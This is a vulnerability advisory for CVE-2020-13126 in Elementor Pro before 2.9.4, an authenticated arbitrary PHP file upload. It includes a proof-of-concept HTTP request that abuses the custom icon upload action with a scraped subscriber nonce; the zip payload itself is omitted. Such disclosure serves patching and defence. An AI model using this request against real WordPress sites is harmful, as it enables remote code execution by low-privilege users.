Elementor Pro < 2.9.4 – Authenticated Arbitrary File Upload | CVE 2020-13126

Description

According to Jerome Bruandet, from NintechNet, the vulnerability, currently exploited by attackers, allows any logged-in user to upload and execute PHP scripts on the blog.

Chloe Chamberland from Wordfence also confirmed the issue and added that "This vulnerability is being used in conjunction with a vulnerability in Ultimate Addons for Elementor that allows for subscriber registration."

Proof of Concept

The following is a sample post where zip_upload can contain a fontello generated zip file with an injected php file. A legitimate nonce can be scraped from the page source of /wp-admin once authenticated as a subscriber for the _nonce field. 

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 
Content-Length: 38005
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryczB4AfBdfz6AZDaF
Origin: http://elementorvuln.vhx.cloud:8080
Referer: [url]/wp-admin/post-new.php?post_type=elementor_icons
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 
Connection: close
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Content-Disposition: form-data; name="zip_upload"; filename="fontello-c6dc39d0.zip"
Content-Type: application/zip
**omitted this for brevity***
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Content-Disposition: form-data; name="actions"
{"pro_assets_manager_custom_icon_upload":{"action":"pro_assets_manager_custom_icon_upload","data":{"post_id":"1"}}}
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Content-Disposition: form-data; name="_nonce"
5052d6f053
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Content-Disposition: form-data; name="action"
elementor_ajax
------WebKitFormBoundaryczB4AfBdfz6AZDaF———